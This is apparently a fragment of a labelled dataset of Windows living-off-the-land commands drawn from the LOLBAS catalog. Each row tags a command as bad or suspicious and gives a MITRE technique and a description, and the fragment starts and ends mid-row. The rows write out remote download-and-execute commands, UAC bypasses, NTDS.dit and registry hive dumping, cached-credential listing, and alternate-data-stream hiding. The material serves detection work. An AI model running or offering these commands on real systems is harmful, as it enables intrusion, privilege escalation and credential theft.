8.1, Windows 10, Windows 11",0.85,False,Execute the specified local .SCT script with scrobj.dll.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3c4ba86759d8db8d23b39e9b,regsvr32.exe /s {PATH:.dll},regsvr32.exe /s {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regsvr32.yml,Regsvr32.exe,Execute,"[""T1218.010"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1987459b1d99c1ed3b5136a0,regsvr32.exe /u /s {PATH:.dll},regsvr32.exe /u /s {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regsvr32.yml,Regsvr32.exe,Execute,"[""T1218.010"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bc0e172ca354ee423e285b54,HH.exe {REMOTEURL:.bat},HH.exe {REMOTEURL:.bat},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Hh.yml,Hh.exe,Download,"[""T1105"", {""Execute"": ""EXE""}, {""Application"": ""GUI""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Open the target batch script with HTML Help.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 68b68825e169e9b85e30f7a8,HH.exe {PATH_ABSOLUTE:.exe},HH.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Hh.yml,Hh.exe,Execute,"[""T1218.001"", {""Execute"": ""EXE""}, {""Application"": ""GUI""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes specified executable with HTML Help.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4fdbf4b074bc868714179a93,HH.exe {REMOTEURL:.chm},HH.exe {REMOTEURL:.chm},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Hh.yml,Hh.exe,Execute,"[""T1218.001"", {""Execute"": ""CMD""}, {""Execute"": ""CHM""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes a remote .chm file which can contain commands.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f01e77c5f51748db8739bbef,print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe},print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Print.yml,Print.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy file.exe into the Alternate Data Stream (ADS) of file.txt.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d1a53734619010558b9d0cc2,print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe},print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Print.yml,Print.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy file from source to destination,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 32612aa6c71e93725980e3ad,print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe},print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Print.yml,Print.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ff85455c134f8df2e6d6a10,start ms-appinstaller://?source={REMOTEURL:.exe},start ms-appinstaller://?source={REMOTEURL:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/AppInstaller.yml,AppInstaller.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b6e981b3015b0fc21331ee89,wsreset.exe,wsreset.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wsreset.yml,Wsreset.exe,UAC Bypass,"[""T1548.002""]","Windows 10, Windows 11",0.85,False,"During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 352a1e871cdc44624449b86b,certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll},certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certoc.yml,CertOC.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]",Windows Server 2022,0.85,False,Loads the target DLL file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 97eaed139303977b56b9582f,certoc.exe -GetCACAPS {REMOTEURL:.ps1},certoc.exe -GetCACAPS {REMOTEURL:.ps1},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certoc.yml,CertOC.exe,Download,"[""T1105""]",Windows Server 2022,0.85,False,Downloads text formatted files,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ad2a79f9101221c29bc1138,ATBroker.exe /start malware,ATBroker.exe /start malware,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Atbroker.yml,Atbroker.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Start a registered Assistive Technology (AT).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8318b11823774ac7fa242057,cmdkey /list,cmdkey /list,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmdkey.yml,Cmdkey.exe,Credentials,"[""T1078""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,List cached credentials,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 234726b2cb984b08da6fec48,bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1,bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bitsadmin.yml,Bitsadmin.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5a57f5d1b1eb702e457b7acf,bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1,bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bitsadmin.yml,Bitsadmin.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 63d5283e5cccdaa8b8532e97,bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset,bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bitsadmin.yml,Bitsadmin.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Command for copying cmd.exe to another folder,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cf5032c2cf31220d55841d0d,bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset,bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bitsadmin.yml,Bitsadmin.exe,Execute,"[""T1218""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 60aacd5a84caf418934413f6,"sftp -o ProxyCommand=""{CMD}"" .","sftp -o ProxyCommand=""{CMD}"" .",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Sftp.yml,Sftp.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 23b13853489efbeee04eb64f,mmc.exe -Embedding {PATH_ABSOLUTE:.msc},mmc.exe -Embedding {PATH_ABSOLUTE:.msc},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mmc.yml,Mmc.exe,Execute,"[""T1218.014"", {""Execute"": ""COM""}]","Windows 10 (and possibly earlier versions), Windows 11",0.85,False,Launch a 'backgrounded' MMC process and invoke a COM payload,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b74c2272e6cbef46678dcb9f,mmc.exe gpedit.msc,mmc.exe gpedit.msc,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Mmc.yml,Mmc.exe,UAC Bypass,"[""T1218.014"", {""Execute"": ""DLL""}]","Windows 10 (and possibly earlier versions), Windows 11",0.85,False,Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4d33434bfc917cd18ec28759,regsvcs.exe {PATH:.dll},regsvcs.exe {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regsvcs.yml,Regsvcs.exe,Execute,"[""T1218.009"", {""Execute"": ""DLL (.NET)""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Loads the target .NET DLL file and executes the RegisterClass function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 62f24775700c515b34d6b7ca,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Aspnet_Compiler.yml,Aspnet_Compiler.exe,AWL Bypass,"[""T1127""]","Windows 10, Windows 11",0.85,False,Execute C# code with the Build Provider and proper folder structure in place.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f013e3cefab8d5a8b6f1c607,expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat},expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Expand.yml,Expand.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies source file to destination.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2ca9d8a2f6a0bd329cbb6892,expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext},expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Expand.yml,Expand.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies source file to destination.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc08a20f276de217efc04877,expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat,expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Expand.yml,Expand.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies source file to destination Alternate Data Stream (ADS),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b7ec2df9345a0df1d45f262,control.exe {PATH_ABSOLUTE}:evil.dll,control.exe {PATH_ABSOLUTE}:evil.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Control.yml,Control.exe,ADS,"[""T1218.002"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute evil.dll which is stored in an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d91f6b7ab9eb49121f8eeeb0,control.exe {PATH_ABSOLUTE:.cpl},control.exe {PATH_ABSOLUTE:.cpl},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Control.yml,Control.exe,Execute,"[""T1218.002"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute .cpl file. A CPL is a DLL file with CPlApplet export function),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9a72949178e8212af13e1632,"wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet","wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wbadmin.yml,wbadmin.exe,Dump,"[""T1003.003""]",Windows Server,0.85,False,Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8f79c4a2cc8486b3e708ae4b,"wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet","wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wbadmin.yml,wbadmin.exe,Dump,"[""T1003.003""]",Windows Server,0.85,False,Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 80fdd9345dbd4ef4f78df13e,cmdl32 /vpn /lan %cd%\config,cmdl32 /vpn /lan %cd%\config,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmdl32.yml,cmdl32.exe,Download,"[""T1105""]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where ""X"" denotes a random number or letter.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b7e6f18e06d4a653347fcff,regasm.exe {PATH:.dll},regasm.exe {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regasm.yml,Regasm.exe,AWL Bypass,"[""T1218.009"", {""Execute"": ""DLL (.NET)""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Loads the target .NET DLL file and executes the RegisterClass function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a135fb205ae593162af93b0d,regasm.exe /U {PATH:.dll},regasm.exe /U {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regasm.yml,Regasm.exe,Execute,"[""T1218.009"", {""Execute"": ""DLL (.NET)""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Loads the target .DLL file and executes the UnRegisterClass function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 374058a0cd54999f154bb408,provlaunch.exe LOLBin,provlaunch.exe LOLBin,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Provlaunch.yml,Provlaunch.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022",0.85,False,"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f137e91370d6a81025c8e081,ieexec.exe {REMOTEURL:.exe},ieexec.exe {REMOTEURL:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ieexec.yml,Ieexec.exe,Download,"[""T1105"", {""Execute"": ""Remote""}, {""Execute"": ""EXE (.NET)""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Downloads and executes executable from the remote server.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fa41ece7e5171d20bda8aed9,cmstp.exe /ni /s {PATH_ABSOLUTE:.inf},cmstp.exe /ni /s {PATH_ABSOLUTE:.inf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmstp.yml,Cmstp.exe,Execute,"[""T1218.003"", {""Execute"": ""INF""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 97b09e77351123a2e3167825,cmstp.exe /ni /s {REMOTEURL:.inf},cmstp.exe /ni /s {REMOTEURL:.inf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmstp.yml,Cmstp.exe,AWL Bypass,"[""T1218.003"", {""Execute"": ""INF""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2a4825e353772cd774d2bde9,cmstp.exe /nf,cmstp.exe /nf,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmstp.yml,Cmstp.exe,Execute,"[""T1218.003"", {""Execute"": ""DLL""}, {""Requires"": ""Registry Change""}]","Windows 10, Windows 11",0.85,False,"cmstp.exe reads the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 15a487909e8a71d827620304,conhost.exe {CMD},conhost.exe {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Conhost.yml,Conhost.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Execute a command line with conhost.exe as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d0147d3997f7d11f92e462c5,conhost.exe --headless {CMD},conhost.exe --headless {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Conhost.yml,Conhost.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Execute a command line with conhost.exe as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 221938fc490484aeb75b891b,csc.exe -out:{PATH:.exe} {PATH:.cs},csc.exe -out:{PATH:.exe} {PATH:.cs},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Csc.yml,Csc.exe,Compile,"[""T1127""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac63ab68ea7000cf9fd0de06,csc -target:library {PATH:.cs},csc -target:library {PATH:.cs},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Csc.yml,Csc.exe,Compile,"[""T1127""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c14302d63f63fd1fc32f5f22,ComputerDefaults.exe,ComputerDefaults.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/ComputerDefaults.yml,ComputerDefaults.exe,UAC Bypass,"[""T1548.002""]","Windows 10, Windows 11",0.85,False,"Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f1f6c32ef53fb684efb88cc8,wab.exe,wab.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wab.yml,Wab.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2efa7c83d0edcd501f5eee62,pcalua.exe -a {PATH:.exe},pcalua.exe -a {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pcalua.yml,Pcalua.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Open the target .EXE using the Program Compatibility Assistant.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 09aaca4b35d8110fb4c6d3a6,pcalua.exe -a {PATH_SMB:.dll},pcalua.exe -a {PATH_SMB:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pcalua.yml,Pcalua.exe,Execute,"[""T1202"", {""Execute"": ""DLL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Open the target .DLL file with the Program Compatibilty Assistant.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f047ecfe743f29a1a5c8b4b4,pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java,pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pcalua.yml,Pcalua.exe,Execute,"[""T1202"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Open the target .CPL file with the Program Compatibility Assistant.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 00048feaf3ec16c5e8d015b6,diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab,diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Diantz.yml,Diantz.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.",0.85,False,Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 475b2ae4b3b2b9b65aaea649,diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab},diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Diantz.yml,Diantz.exe,Download,"[""T1105"", {""Type"": ""Compression""}]","Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019",0.85,False,Download and compress a remote file and store it in a CAB file on local machine.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7c0266142e3efcc8ff99905d,diantz /f {PATH:.ddf},diantz /f {PATH:.ddf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Diantz.yml,Diantz.exe,Execute,"[""T1036"", {""Type"": ""Compression""}]","Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019",0.85,False,Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a8f6d7ddcbb6f289712c753,Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe},Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml,Microsoft.NodejsTools.PressAnyKey.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f0034fc7957e4e233f1a4d48,sqldumper.exe 464 0 0x0110,sqldumper.exe 464 0 0x0110,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Sqldumper.yml,Sqldumper.exe,Dump,"[""T1003""]",Windows,0.85,False,Dump process by PID and create a dump file (Appears to create a dump file called 